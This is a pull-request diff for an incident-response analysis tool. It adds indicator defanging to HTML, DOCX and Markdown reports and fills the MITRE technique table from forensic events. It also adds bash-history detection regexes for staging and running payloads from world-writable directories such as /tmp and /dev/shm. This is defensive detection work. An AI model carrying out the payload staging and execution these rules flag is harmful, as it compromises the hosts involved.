### PR TITLE
fix: defang report indicators, populate the MITRE table, grade payload execution

### DIFF
--- a/ARCHITECTURE.md
+++ b/ARCHITECTURE.md
@@ -219,7 +219,7 @@ established, and it works the same way.
 The graph is built the same way `check-imports.mjs` builds it: a regex over relative `.js`
 specifiers, because the companion imports its own modules exclusively that way. No resolver needed.
 
-For context: **1,975 of the 2,014 cross-domain file dependencies already comply.** The map is mostly
+For context: **1,976 of the 2,015 cross-domain file dependencies already comply.** The map is mostly
 a description of how this codebase is already written, which is the only kind of rule people follow.
 Both figures come from `npm run check:boundaries -- --json`, which counts them in the same pass that
 finds the violations, and a test asserts this sentence against it. The pair read 1,275 of 1,323 long

--- a/ARCHITECTURE.md
+++ b/ARCHITECTURE.md
@@ -219,7 +219,7 @@ established, and it works the same way.
 The graph is built the same way `check-imports.mjs` builds it: a regex over relative `.js`
 specifiers, because the companion imports its own modules exclusively that way. No resolver needed.
 
-For context: **1,974 of the 2,013 cross-domain file dependencies already comply.** The map is mostly
+For context: **1,975 of the 2,014 cross-domain file dependencies already comply.** The map is mostly
 a description of how this codebase is already written, which is the only kind of rule people follow.
 Both figures come from `npm run check:boundaries -- --json`, which counts them in the same pass that
 finds the violations, and a test asserts this sentence against it. The pair read 1,275 of 1,323 long

--- a/companion/scripts/module-map.json
+++ b/companion/scripts/module-map.json
@@ -160,6 +160,7 @@
     "attack.ts": "analysis/intel",
     "attackMitigations.ts": "analysis/intel",
     "attackMitigationsData.ts": "analysis/intel",
+    "attackTechniqueNames.ts": "analysis/timeline",
     "auditdImport.ts": "analysis/ingest",
     "awsImport.ts": "analysis/ingest",
     "bashHistoryImport.ts": "analysis/ingest",

--- a/companion/src/analysis/analysisRunStore.ts
+++ b/companion/src/analysis/analysisRunStore.ts
@@ -238,11 +238,15 @@ export class AnalysisRunStore {
         await handle.writeFile(JSON.stringify(manifest, null, 2), "utf8");
         await handle.sync();
       } catch (err) {
+        // The marker is deliberately LEFT in place on failure. It may predate this attempt — a
+        // retry of an id whose first attempt wrote the manifest but died before pinning the head
+        // hits EEXIST here, and the marker is then the only remaining signal that the head is
+        // stale. Clearing it would let the next append trust that head and reuse a sequence that
+        // is already on disk, forking the chain permanently. A stale marker only costs the next
+        // append one rescan, and the next successful append clears it.
         if ((err as NodeJS.ErrnoException).code === "EEXIST") {
-          await rm(this.pendingPath(caseId), { force: true });
           throw new Error(`analysis run ${manifest.id} already exists`);
         }
-        await rm(this.pendingPath(caseId), { force: true });
         throw err;
       } finally {
         await handle?.close();

--- a/companion/src/analysis/attackTechniqueNames.ts
+++ b/companion/src/analysis/attackTechniqueNames.ts
@@ -1,0 +1,102 @@
+// Dependency-free ATT&CK reference data and the pure helpers over it.
+//
+// Split out of reconTechniques.ts so the foundational half can sit at the lowest analysis tier.
+// The id -> name table is reference data with no imports, and BOTH analysis/timeline (stateMerge,
+// building the case's MITRE aggregate) and analysis/intel (reconTechniques, classifying command
+// lines) need it. Matching command lines to techniques is intel work and stays there; naming a
+// technique is not, and a tier-0 module is the only place a tier-0 caller may reach. #878.
+
+// ATT&CK technique names — the recon set plus the techniques the deterministic importers commonly
+// emit, so the MITRE table built from event tags reads with real names (falls back to the bare id).
+const TECHNIQUE_NAMES: Readonly<Record<string, string>> = {
+  T1033: "System Owner/User Discovery",
+  T1016: "System Network Configuration Discovery",
+  T1082: "System Information Discovery",
+  "T1069.002": "Permission Groups Discovery: Domain Groups",
+  "T1087.002": "Account Discovery: Domain Account",
+  T1018: "Remote System Discovery",
+  T1083: "File and Directory Discovery",
+  "T1552.004": "Unsecured Credentials: Private Keys",
+  "T1552.001": "Unsecured Credentials: Credentials in Files",
+  T1003: "OS Credential Dumping",
+  "T1003.001": "OS Credential Dumping: LSASS Memory",
+  T1055: "Process Injection",
+  T1059: "Command and Scripting Interpreter",
+  "T1059.004": "Command and Scripting Interpreter: Unix Shell",
+  T1071: "Application Layer Protocol",
+  "T1071.001": "Application Layer Protocol: Web Protocols",
+  T1105: "Ingress Tool Transfer",
+  T1041: "Exfiltration Over C2 Channel",
+  T1005: "Data from Local System",
+  "T1560.001": "Archive Collected Data: Archive via Utility",
+  "T1070.003": "Indicator Removal: Clear Command History",
+  "T1070.002": "Indicator Removal: Clear Linux or Mac System Logs",
+  "T1070.001": "Indicator Removal: Clear Windows Event Logs",
+  T1036: "Masquerading",
+  "T1204.002": "User Execution: Malicious File",
+  "T1566.002": "Phishing: Spearphishing Link",
+  "T1021.004": "Remote Services: SSH",
+  T1140: "Deobfuscate/Decode Files or Information",
+  "T1053.003": "Scheduled Task/Job: Cron",
+  "T1543.002": "Create or Modify System Process: Systemd Service",
+  "T1548.001": "Abuse Elevation Control Mechanism: Setuid and Setgid",
+  // ── discovery + tradecraft techniques added from the DFIR Report corpus ──
+  T1482: "Domain Trust Discovery",
+  T1046: "Network Service Discovery",
+  T1135: "Network Share Discovery",
+  "T1518.001": "Security Software Discovery",
+  "T1003.002": "OS Credential Dumping: Security Account Manager",
+  "T1003.003": "OS Credential Dumping: NTDS",
+  "T1003.006": "OS Credential Dumping: DCSync",
+  T1555: "Credentials from Password Stores",
+  "T1558.003": "Steal or Forge Kerberos Tickets: Kerberoasting",
+  "T1114.002": "Email Collection: Remote Email Collection",
+  "T1562.001": "Impair Defenses: Disable or Modify Tools",
+  T1112: "Modify Registry",
+  "T1548.002": "Abuse Elevation Control Mechanism: Bypass User Account Control",
+  T1490: "Inhibit System Recovery",
+  T1486: "Data Encrypted for Impact",
+  T1489: "Service Stop",
+  "T1021.002": "Remote Services: SMB/Windows Admin Shares",
+  T1047: "Windows Management Instrumentation",
+  T1572: "Protocol Tunneling",
+  T1090: "Proxy",
+  "T1567.002": "Exfiltration to Cloud Storage",
+  T1219: "Remote Access Software",
+  T1068: "Exploitation for Privilege Escalation",
+  // ── discovery + tradecraft techniques added from the Huntress Rapid Response corpus ──
+  "T1543.003": "Create or Modify System Process: Windows Service",
+  "T1564.002": "Hide Artifacts: Hidden Users",
+  "T1098.007": "Account Manipulation: Additional Local or Domain Groups",
+  "T1222.002":
+    "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification",
+  "T1559.001": "Inter-Process Communication: Component Object Model",
+  "T1218.007": "System Binary Proxy Execution: Msiexec",
+  "T1555.003": "Credentials from Password Stores: Credentials from Web Browsers",
+};
+
+// Best-effort ATT&CK technique name for a given id (falls back to the bare id).
+export function techniqueName(id: string): string {
+  return TECHNIQUE_NAMES[id] ?? id;
+}
+
+// Union the ATT&CK techniques carried by (in-scope) forensic events into the synthesized MITRE
+// table, so deterministically-identified techniques the model didn't echo (esp. the Info/Low
+// discovery phase) still appear in the case's MITRE table / report. Operates over the SAME
+// scope/legitimate-filtered events synthesis saw, so it never reintroduces out-of-scope techniques.
+// Pure + idempotent.
+export function unionEventTechniques(
+  table: ReadonlyArray<{ id: string; name: string; findingIds: string[] }>,
+  events: ReadonlyArray<{ mitreTechniques: string[] }>,
+): Array<{ id: string; name: string; findingIds: string[] }> {
+  const have = new Set(table.map((t) => t.id));
+  const out = table.map((t) => ({ ...t }));
+  for (const e of events) {
+    for (const id of e.mitreTechniques) {
+      if (!id || have.has(id)) continue;
+      have.add(id);
+      out.push({ id, name: techniqueName(id), findingIds: [] });
+    }
+  }
+  return out;
+}

--- a/companion/src/analysis/bashHistoryImport.ts
+++ b/companion/src/analysis/bashHistoryImport.ts
@@ -155,6 +155,23 @@ const CMD_RULES: CmdRule[] = [
     severity: "Medium",
     mitre: ["T1548.001"],
   },
+  // Staging a payload in a world-writable directory and making it runnable. The fetch itself is
+  // graded separately (ingress tool transfer, below); this is the step that turns a downloaded file
+  // into an executable one. Grading it Info kept the whole execution off the forensic timeline, so
+  // a synthesis pass could see the download and never see that it ran. #877.
+  {
+    re: /\bchmod\s+(?:[+ugoa]*\+x|[0-7]{3,4})[^\n]*(?:\/tmp\/|\/var\/tmp\/|\/dev\/shm\/)/i,
+    severity: "Medium",
+    mitre: ["T1222.002", "T1059.004"],
+  },
+  // Running a binary straight out of a world-writable directory. Anchored to command position
+  // (line start or after a separator) so an ordinary `cat /tmp/notes.txt` or `curl -o /tmp/x`,
+  // where the path is just an argument, stays untouched.
+  {
+    re: /(?:^|[;&|]+\s*)(?:\/tmp\/|\/var\/tmp\/|\/dev\/shm\/)[^\s;&|]+/i,
+    severity: "Medium",
+    mitre: ["T1059.004"],
+  },
   // Exfiltration over web — curl/wget UPLOADING a file (POST form / --upload-file / --data-binary),
   // distinct from (and worse than) a plain download below. #199. T1567.002 (Exfiltration to Cloud
   // Storage) is the historically-accurate label for an HTTP(S) upload; T1041 is kept alongside it

--- a/companion/src/analysis/bashHistoryImport.ts
+++ b/companion/src/analysis/bashHistoryImport.ts
@@ -155,22 +155,34 @@ const CMD_RULES: CmdRule[] = [
     severity: "Medium",
     mitre: ["T1548.001"],
   },
-  // Staging a payload in a world-writable directory and making it runnable. The fetch itself is
-  // graded separately (ingress tool transfer, below); this is the step that turns a downloaded file
-  // into an executable one. Grading it Info kept the whole execution off the forensic timeline, so
-  // a synthesis pass could see the download and never see that it ran. #877.
+  // Staging a payload in a world-writable directory and running it, on one line. Graded first so
+  // the combined form keeps BOTH the permission change and the execution; the two rules below
+  // catch each half on its own. Grading this Info kept the execution off the forensic timeline
+  // entirely, so a synthesis pass could see the download and never see that it ran. #877.
   {
-    re: /\bchmod\s+(?:[+ugoa]*\+x|[0-7]{3,4})[^\n]*(?:\/tmp\/|\/var\/tmp\/|\/dev\/shm\/)/i,
+    re: /\bchmod\s+(?:[+ugoa]*\+x|[0-7]?(?:[1357][0-7]{2}|[0-7][1357][0-7]|[0-7]{2}[1357]))\b[^\n]*[;&|]+\s*(?:\/tmp\/|\/var\/tmp\/|\/dev\/shm\/)[^\s;&|]/i,
     severity: "Medium",
     mitre: ["T1222.002", "T1059.004"],
   },
   // Running a binary straight out of a world-writable directory. Anchored to command position
   // (line start or after a separator) so an ordinary `cat /tmp/notes.txt` or `curl -o /tmp/x`,
-  // where the path is just an argument, stays untouched.
+  // where the path is only an argument, stays untouched.
   {
     re: /(?:^|[;&|]+\s*)(?:\/tmp\/|\/var\/tmp\/|\/dev\/shm\/)[^\s;&|]+/i,
     severity: "Medium",
     mitre: ["T1059.004"],
+  },
+  // Granting execute on a file in a world-writable directory, with nothing run on the same line.
+  // A permission change is NOT execution, so this carries no T1059 tag — claiming one would let a
+  // routine `chmod` manufacture an attacker-execution narrative in synthesis. The numeric form
+  // must actually set an execute bit (an odd digit in one of the three permission positions), so
+  // `chmod 644 /tmp/config` and `chmod 666 /tmp/sock` match nothing. A trailing character after
+  // the directory is required too, so `chmod 1777 /tmp/` — sticky-bitting the directory itself,
+  // routine administration — is left alone.
+  {
+    re: /\bchmod\s+(?:[+ugoa]*\+x|[0-7]?(?:[1357][0-7]{2}|[0-7][1357][0-7]|[0-7]{2}[1357]))\b[^\n]*(?:\/tmp\/|\/var\/tmp\/|\/dev\/shm\/)[^\s;&|]/i,
+    severity: "Medium",
+    mitre: ["T1222.002"],
   },
   // Exfiltration over web — curl/wget UPLOADING a file (POST form / --upload-file / --data-binary),
   // distinct from (and worse than) a plain download below. #199. T1567.002 (Exfiltration to Cloud

--- a/companion/src/analysis/reconTechniques.ts
+++ b/companion/src/analysis/reconTechniques.ts
@@ -1,3 +1,7 @@
+import { techniqueName, unionEventTechniques } from "./attackTechniqueNames.js";
+// Re-exported so existing importers keep one entry point for technique naming.
+export { techniqueName, unionEventTechniques };
+
 // Discovery / credential-access technique tagging for process command lines (recon-burst tagging).
 // Individually-benign recon commands (whoami, ipconfig, net group, dir /s, findstr password, cat .env)
 // rarely earn a finding on their own, but they ARE the attacker's host/domain/credential enumeration,
@@ -110,80 +114,6 @@ const RECON_RULES: ReconRule[] = [
   { re: /\bssh\b\s+[^\n]*@|\bscp\b\s+[^\n]*@[^\n]*:/i, ids: ["T1021.004"] },
 ];
 
-// ATT&CK technique names — the recon set plus the techniques the deterministic importers commonly
-// emit, so the MITRE table built from event tags reads with real names (falls back to the bare id).
-const TECHNIQUE_NAMES: Readonly<Record<string, string>> = {
-  T1033: "System Owner/User Discovery",
-  T1016: "System Network Configuration Discovery",
-  T1082: "System Information Discovery",
-  "T1069.002": "Permission Groups Discovery: Domain Groups",
-  "T1087.002": "Account Discovery: Domain Account",
-  T1018: "Remote System Discovery",
-  T1083: "File and Directory Discovery",
-  "T1552.004": "Unsecured Credentials: Private Keys",
-  "T1552.001": "Unsecured Credentials: Credentials in Files",
-  T1003: "OS Credential Dumping",
-  "T1003.001": "OS Credential Dumping: LSASS Memory",
-  T1055: "Process Injection",
-  T1059: "Command and Scripting Interpreter",
-  "T1059.004": "Command and Scripting Interpreter: Unix Shell",
-  T1071: "Application Layer Protocol",
-  "T1071.001": "Application Layer Protocol: Web Protocols",
-  T1105: "Ingress Tool Transfer",
-  T1041: "Exfiltration Over C2 Channel",
-  T1005: "Data from Local System",
-  "T1560.001": "Archive Collected Data: Archive via Utility",
-  "T1070.003": "Indicator Removal: Clear Command History",
-  "T1070.002": "Indicator Removal: Clear Linux or Mac System Logs",
-  "T1070.001": "Indicator Removal: Clear Windows Event Logs",
-  T1036: "Masquerading",
-  "T1204.002": "User Execution: Malicious File",
-  "T1566.002": "Phishing: Spearphishing Link",
-  "T1021.004": "Remote Services: SSH",
-  T1140: "Deobfuscate/Decode Files or Information",
-  "T1053.003": "Scheduled Task/Job: Cron",
-  "T1543.002": "Create or Modify System Process: Systemd Service",
-  "T1548.001": "Abuse Elevation Control Mechanism: Setuid and Setgid",
-  // ── discovery + tradecraft techniques added from the DFIR Report corpus ──
-  T1482: "Domain Trust Discovery",
-  T1046: "Network Service Discovery",
-  T1135: "Network Share Discovery",
-  "T1518.001": "Security Software Discovery",
-  "T1003.002": "OS Credential Dumping: Security Account Manager",
-  "T1003.003": "OS Credential Dumping: NTDS",
-  "T1003.006": "OS Credential Dumping: DCSync",
-  T1555: "Credentials from Password Stores",
-  "T1558.003": "Steal or Forge Kerberos Tickets: Kerberoasting",
-  "T1114.002": "Email Collection: Remote Email Collection",
-  "T1562.001": "Impair Defenses: Disable or Modify Tools",
-  T1112: "Modify Registry",
-  "T1548.002": "Abuse Elevation Control Mechanism: Bypass User Account Control",
-  T1490: "Inhibit System Recovery",
-  T1486: "Data Encrypted for Impact",
-  T1489: "Service Stop",
-  "T1021.002": "Remote Services: SMB/Windows Admin Shares",
-  T1047: "Windows Management Instrumentation",
-  T1572: "Protocol Tunneling",
-  T1090: "Proxy",
-  "T1567.002": "Exfiltration to Cloud Storage",
-  T1219: "Remote Access Software",
-  T1068: "Exploitation for Privilege Escalation",
-  // ── discovery + tradecraft techniques added from the Huntress Rapid Response corpus ──
-  "T1543.003": "Create or Modify System Process: Windows Service",
-  "T1564.002": "Hide Artifacts: Hidden Users",
-  "T1098.007": "Account Manipulation: Additional Local or Domain Groups",
-  "T1222.002":
-    "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification",
-  "T1559.001": "Inter-Process Communication: Component Object Model",
-  "T1218.007": "System Binary Proxy Execution: Msiexec",
-  "T1555.003": "Credentials from Password Stores: Credentials from Web Browsers",
-};
-
-// Best-effort ATT&CK technique name for a given id (falls back to the bare id).
-export function techniqueName(id: string): string {
-  return TECHNIQUE_NAMES[id] ?? id;
-}
-
 // The ATT&CK technique ids a process command line indicates (deduped) — discovery / credential
 // access plus the action techniques (collection / exfil / anti-forensics / transfer / SSH) that
 // survive in EDR/Sysmon telemetry even when the shell history is cleared.
@@ -192,25 +122,4 @@ export function reconTechniques(image: string, cmd: string): string[] {
   const out = new Set<string>();
   for (const rule of RECON_RULES) if (rule.re.test(blob)) for (const id of rule.ids) out.add(id);
   return [...out];
-}
-
-// Union the ATT&CK techniques carried by (in-scope) forensic events into the synthesized MITRE
-// table, so deterministically-identified techniques the model didn't echo (esp. the Info/Low
-// discovery phase) still appear in the case's MITRE table / report. Operates over the SAME
-// scope/legitimate-filtered events synthesis saw, so it never reintroduces out-of-scope techniques.
-// Pure + idempotent.
-export function unionEventTechniques(
-  table: ReadonlyArray<{ id: string; name: string; findingIds: string[] }>,
-  events: ReadonlyArray<{ mitreTechniques: string[] }>,
-): Array<{ id: string; name: string; findingIds: string[] }> {
-  const have = new Set(table.map((t) => t.id));
-  const out = table.map((t) => ({ ...t }));
-  for (const e of events) {
-    for (const id of e.mitreTechniques) {
-      if (!id || have.has(id)) continue;
-      have.add(id);
-      out.push({ id, name: techniqueName(id), findingIds: [] });
-    }
-  }
-  return out;
 }

--- a/companion/src/analysis/stateMerge.ts
+++ b/companion/src/analysis/stateMerge.ts
@@ -18,6 +18,7 @@ import { matchIocToExclude } from "./iocExclude.js";
 import { repairIocValue } from "./iocValue.js";
 import { sanitizeUncertainties } from "./uncertainty.js";
 import { mergeCanonicalEvents } from "./canonicalEvent.js";
+import { unionEventTechniques } from "./attackTechniqueNames.js";
 
 // Trim a raw collect directive (investigation-guidance #8) to its non-empty string fields; returns
 // undefined when nothing useful is present, so an all-blank object isn't persisted.
@@ -345,6 +346,14 @@ export function mergeDelta(
   // during synthesis. Idempotent.
   const correlated = correlateEvents(withExfil).sort(byEventTime);
 
+  // Deterministic importers hardcode the delta's top-level mitreTechniques to [] and carry the real
+  // technique IDs on the forensic events instead, so the aggregate above sees nothing to collect.
+  // The MITRE panel and the report's MITRE section both read that aggregate, which is why they
+  // stayed empty while Kill Chain and the ATT&CK Navigator export — which read the events directly
+  // — showed the techniques. Union from the merged timeline so any delta contributes, and so an
+  // existing case heals on its next merge. Idempotent: ids already present are skipped. #878.
+  const mitreWithEvents = unionEventTechniques(mitreTechniques, correlated);
+
   // Key questions are a holistic reassessment — replace wholesale when synthesis
   // provides them; otherwise keep the existing set (per-window deltas omit them).
   const keyQuestions =
@@ -387,7 +396,7 @@ export function mergeDelta(
     openThreads,
     timeline,
     forensicTimeline: correlated,
-    mitreTechniques,
+    mitreTechniques: mitreWithEvents,
     keyQuestions,
     nextSteps,
     uncertainties,

--- a/companion/src/reports/defang.ts
+++ b/companion/src/reports/defang.ts
@@ -1,0 +1,63 @@
+// Defang indicators in human-readable report output.
+//
+// The incident report is the artifact that travels furthest — to managers, to counsel, to the
+// client — and it is read by people who click things. Standard DFIR practice is to render every
+// indicator inert so a mis-click cannot reach attacker infrastructure from the reader's machine.
+// Rendering them as `hxxp://evil[.]example` also stops the Markdown renderer autolinking them,
+// so the same pass removes both the live text and the anchor it would have become. #883.
+//
+// This is the inverse of analysis/iocValue.refangIocValue, and deliberately mirrors its rule about
+// scope: only the scheme and authority are rewritten, because that is the part a click acts on. The
+// path, query and fragment are left exactly as found — they may legitimately contain the same
+// character sequences, and rewriting them would change a string that correlation and retrieval
+// depend on matching. A defanged value round-trips back through refangIocValue.
+//
+// Applies to the human-readable report only. The machine-consumed exports (CSV, STIX, the ATT&CK
+// Navigator layer, the JSON state) keep live values, because the tools that ingest them match on
+// the real indicator.
+
+// One combined pattern so each indicator is rewritten exactly once, and text between matches is
+// never touched. Order matters: a URL is tried before the email and bare-IPv4 forms, so an IPv4
+// host inside a URL is handled by the URL branch rather than being defanged twice.
+const INDICATOR_RE =
+  /\bhttps?:\/\/[^\s<>"'`|\]),]+|\b[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+|\b(?:\d{1,3}\.){3}\d{1,3}\b/gi;
+
+// Punctuation that ends a sentence rather than the indicator, so it is put back untouched.
+const TRAILING_PUNCTUATION_RE = /[.,;:!?'")\]}>]+$/;
+
+function defangHost(host: string): string {
+  return host.replace(/\./g, "[.]");
+}
+
+function defangUrl(url: string): string {
+  const scheme = /^(https?)(:\/\/)/i.exec(url);
+  if (!scheme) return url;
+  // http -> hxxp, https -> hxxps, preserving the case the report already used.
+  const neutered = scheme[1].replace(/t/gi, (c) => (c === "T" ? "X" : "x"));
+  const rest = url.slice(scheme[0].length);
+  const pathStart = rest.search(/[/?#]/);
+  const authority = pathStart === -1 ? rest : rest.slice(0, pathStart);
+  const tail = pathStart === -1 ? "" : rest.slice(pathStart);
+  return `${neutered}${scheme[2]}${defangHost(authority)}${tail}`;
+}
+
+function defangEmail(email: string): string {
+  const at = email.indexOf("@");
+  return `${email.slice(0, at)}[@]${defangHost(email.slice(at + 1))}`;
+}
+
+/**
+ * Render every URL, email address and IPv4 address in `text` inert.
+ *
+ * Idempotent: already-defanged text contains no bare scheme, `@` or dotted quad for the pattern to
+ * match, so running it twice is the same as running it once.
+ */
+export function defangIndicators(text: string): string {
+  return text.replace(INDICATOR_RE, (match) => {
+    const trailing = TRAILING_PUNCTUATION_RE.exec(match)?.[0] ?? "";
+    const indicator = trailing ? match.slice(0, -trailing.length) : match;
+    if (/^https?:\/\//i.test(indicator)) return defangUrl(indicator) + trailing;
+    if (indicator.includes("@")) return defangEmail(indicator) + trailing;
+    return defangHost(indicator) + trailing;
+  });
+}

--- a/companion/src/reports/defang.ts
+++ b/companion/src/reports/defang.ts
@@ -17,10 +17,24 @@
 // the real indicator.
 
 // One combined pattern so each indicator is rewritten exactly once, and text between matches is
-// never touched. Order matters: a URL is tried before the email and bare-IPv4 forms, so an IPv4
-// host inside a URL is handled by the URL branch rather than being defanged twice.
+// never touched. Order matters: a URL is tried before the email, bare-IPv4 and bare-domain forms,
+// so a host inside a URL is handled by the URL branch — which leaves the path alone — rather than
+// being matched again by the domain branch further along the same span.
+import type { InvestigationState } from "../analysis/stateTypes.js";
+
+/**
+ * Domain values the case itself records as indicators, for defangIndicators' second argument.
+ * Keeps the "is this a domain" decision on data the case already asserted, rather than on a guess
+ * about the shape of a dotted token.
+ */
+export function caseDomains(state: InvestigationState): string[] {
+  return state.iocs.filter((ioc) => ioc.type === "domain").map((ioc) => ioc.value);
+}
+
 const INDICATOR_RE =
-  /\bhttps?:\/\/[^\s<>"'`|\]),]+|\b[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+|\b(?:\d{1,3}\.){3}\d{1,3}\b/gi;
+  /\bhttps?:\/\/[^\s<>"'`|\]),]+|\b[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+|\b(?:\d{1,3}\.){3}\d{1,3}\b|\b[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\b/gi;
+
+const IPV4_RE = /^(?:\d{1,3}\.){3}\d{1,3}$/;
 
 // Punctuation that ends a sentence rather than the indicator, so it is put back untouched.
 const TRAILING_PUNCTUATION_RE = /[.,;:!?'")\]}>]+$/;
@@ -52,12 +66,22 @@ function defangEmail(email: string): string {
  * Idempotent: already-defanged text contains no bare scheme, `@` or dotted quad for the pattern to
  * match, so running it twice is the same as running it once.
  */
-export function defangIndicators(text: string): string {
+export function defangIndicators(text: string, knownDomains: Iterable<string> = []): string {
+  const known = new Set([...knownDomains].map((d) => d.trim().toLowerCase()).filter(Boolean));
   return text.replace(INDICATOR_RE, (match) => {
     const trailing = TRAILING_PUNCTUATION_RE.exec(match)?.[0] ?? "";
     const indicator = trailing ? match.slice(0, -trailing.length) : match;
     if (/^https?:\/\//i.test(indicator)) return defangUrl(indicator) + trailing;
     if (indicator.includes("@")) return defangEmail(indicator) + trailing;
-    return defangHost(indicator) + trailing;
+    if (IPV4_RE.test(indicator)) return defangHost(indicator) + trailing;
+    // A bare dotted token is only a domain when we can say so without guessing. Two cases qualify:
+    // a `www.` host, which the Markdown autolinker turns into a live link on sight, and a value the
+    // case itself records as a domain IOC. Guessing more widely would mangle the filenames a
+    // forensic report is full of — `vitest.config.ts` and `History.db` have the shape of a domain
+    // and a two-letter TLD, and analysis/textDomains deliberately accepts that class because for
+    // IOC extraction a false positive is cheap. In a deliverable it is not.
+    const lower = indicator.toLowerCase();
+    if (lower.startsWith("www.") || known.has(lower)) return defangHost(indicator) + trailing;
+    return match;
   });
 }

--- a/companion/src/reports/docx.ts
+++ b/companion/src/reports/docx.ts
@@ -19,6 +19,7 @@ import type { Tokens, TokensList } from "marked";
 import type { InvestigationState } from "../analysis/stateTypes.js";
 import type { CustomerExposureSummary } from "../analysis/customerExposure.js";
 import { renderMarkdownReport } from "./markdown.js";
+import { defangIndicators } from "./defang.js";
 import { renderScopeSection } from "./scopeSection.js";
 import type { HostScopeLedger } from "../analysis/hostScope.js";
 import { emptyReportMeta, type ReportMeta } from "./reportMeta.js";
@@ -476,11 +477,14 @@ export async function renderDocxReport(
   );
   // The scoping statement is appended rather than threaded through renderMarkdownReport:
   // markdown.ts sits at its size cap, and every format must carry the same canonical report.
-  const mdWithScope = hostScope
-    ? `${md}
+  // Defanged after the scope section is appended — see html.ts for why this sits at the seam.
+  const mdWithScope = defangIndicators(
+    hostScope
+      ? `${md}
 
 ${renderScopeSection(hostScope)}`
-    : md;
+      : md,
+  );
   const marked = new Marked({ gfm: true });
   const tokens = marked.lexer(mdWithScope);
   const children = tokensToDocxChildren(tokens);

--- a/companion/src/reports/docx.ts
+++ b/companion/src/reports/docx.ts
@@ -19,7 +19,7 @@ import type { Tokens, TokensList } from "marked";
 import type { InvestigationState } from "../analysis/stateTypes.js";
 import type { CustomerExposureSummary } from "../analysis/customerExposure.js";
 import { renderMarkdownReport } from "./markdown.js";
-import { defangIndicators } from "./defang.js";
+import { caseDomains, defangIndicators } from "./defang.js";
 import { renderScopeSection } from "./scopeSection.js";
 import type { HostScopeLedger } from "../analysis/hostScope.js";
 import { emptyReportMeta, type ReportMeta } from "./reportMeta.js";
@@ -484,8 +484,18 @@ export async function renderDocxReport(
 
 ${renderScopeSection(hostScope)}`
       : md,
+    caseDomains(state),
   );
   const marked = new Marked({ gfm: true });
+  // Same autolink kill-switch as html.ts — a bare `www.` host must not become a hyperlink here
+  // either, and the .docx is the copy an executive is most likely to click in.
+  marked.use({
+    tokenizer: {
+      url(): undefined {
+        return undefined;
+      },
+    },
+  });
   const tokens = marked.lexer(mdWithScope);
   const children = tokensToDocxChildren(tokens);
   // Brand the headings with the template's accent colour (a validated #rrggbb). The default

--- a/companion/src/reports/html.ts
+++ b/companion/src/reports/html.ts
@@ -3,6 +3,7 @@ import type { InvestigationState } from "../analysis/stateTypes.js";
 import type { CustomerExposureSummary } from "../analysis/customerExposure.js";
 import { buildAssetGraph } from "../analysis/assetGraph.js";
 import { renderMarkdownReport } from "./markdown.js";
+import { defangIndicators } from "./defang.js";
 import { renderScopeSection } from "./scopeSection.js";
 import { escapeHtml } from "./escapeHtml.js";
 import type { CustodyRecord } from "../analysis/custody.js";
@@ -155,11 +156,16 @@ export function renderHtmlReport(
   );
   // The scoping statement is appended rather than threaded through renderMarkdownReport:
   // markdown.ts sits at its size cap, and every format must carry the same canonical report.
-  const markdownWithScope = hostScope
-    ? `${markdown}
+  // Defanged AFTER the scope section is appended, so the hosts and addresses it names are rendered
+  // inert too. Applied at each format's assembly seam rather than inside renderMarkdownReport for
+  // that reason; tests assert it on the .md, .html and .docx outputs so the three cannot diverge.
+  const markdownWithScope = defangIndicators(
+    hostScope
+      ? `${markdown}
 
 ${renderScopeSection(hostScope)}`
-    : markdown;
+      : markdown,
+  );
 
   const marked = new Marked({ gfm: true });
   // Escape any raw HTML tokens in the source instead of emitting them verbatim.

--- a/companion/src/reports/html.ts
+++ b/companion/src/reports/html.ts
@@ -3,7 +3,7 @@ import type { InvestigationState } from "../analysis/stateTypes.js";
 import type { CustomerExposureSummary } from "../analysis/customerExposure.js";
 import { buildAssetGraph } from "../analysis/assetGraph.js";
 import { renderMarkdownReport } from "./markdown.js";
-import { defangIndicators } from "./defang.js";
+import { caseDomains, defangIndicators } from "./defang.js";
 import { renderScopeSection } from "./scopeSection.js";
 import { escapeHtml } from "./escapeHtml.js";
 import type { CustodyRecord } from "../analysis/custody.js";
@@ -165,11 +165,19 @@ export function renderHtmlReport(
 
 ${renderScopeSection(hostScope)}`
       : markdown,
+    caseDomains(state),
   );
 
   const marked = new Marked({ gfm: true });
-  // Escape any raw HTML tokens in the source instead of emitting them verbatim.
+  // Escape any raw HTML tokens in the source instead of emitting them verbatim, and switch off GFM
+  // autolinking entirely: report text is untrusted evidence, and a bare `www.` host becomes a live
+  // anchor on sight. Explicit [text](url) links, tables and strikethrough are unaffected. #883.
   marked.use({
+    tokenizer: {
+      url(): undefined {
+        return undefined;
+      },
+    },
     renderer: {
       html(token: string | { text?: string }): string {
         return escapeHtml(typeof token === "string" ? token : (token.text ?? ""));

--- a/companion/src/reports/reportContents.ts
+++ b/companion/src/reports/reportContents.ts
@@ -13,7 +13,7 @@ import type { SynthesisCoverage, ModelPerfSnapshot } from "../analysis/synthMeta
 import { renderMarkdownReport } from "./markdown.js";
 import { renderHtmlReport } from "./html.js";
 import { renderScopeSection } from "./scopeSection.js";
-import { defangIndicators } from "./defang.js";
+import { caseDomains, defangIndicators } from "./defang.js";
 import { defaultReportTemplate, type ReportTemplate } from "./reportTemplate.js";
 import type { ReportMeta } from "./reportMeta.js";
 import { findingsCsv, iocsCsv, timelineCsv, forensicTimelineCsv } from "./csv.js";
@@ -67,6 +67,7 @@ export function renderReportContents(
         complianceControl,
         custody,
       ) + scopeSection,
+      caseDomains(state),
     ),
     html: renderHtmlReport(
       state,

--- a/companion/src/reports/reportContents.ts
+++ b/companion/src/reports/reportContents.ts
@@ -13,6 +13,7 @@ import type { SynthesisCoverage, ModelPerfSnapshot } from "../analysis/synthMeta
 import { renderMarkdownReport } from "./markdown.js";
 import { renderHtmlReport } from "./html.js";
 import { renderScopeSection } from "./scopeSection.js";
+import { defangIndicators } from "./defang.js";
 import { defaultReportTemplate, type ReportTemplate } from "./reportTemplate.js";
 import type { ReportMeta } from "./reportMeta.js";
 import { findingsCsv, iocsCsv, timelineCsv, forensicTimelineCsv } from "./csv.js";
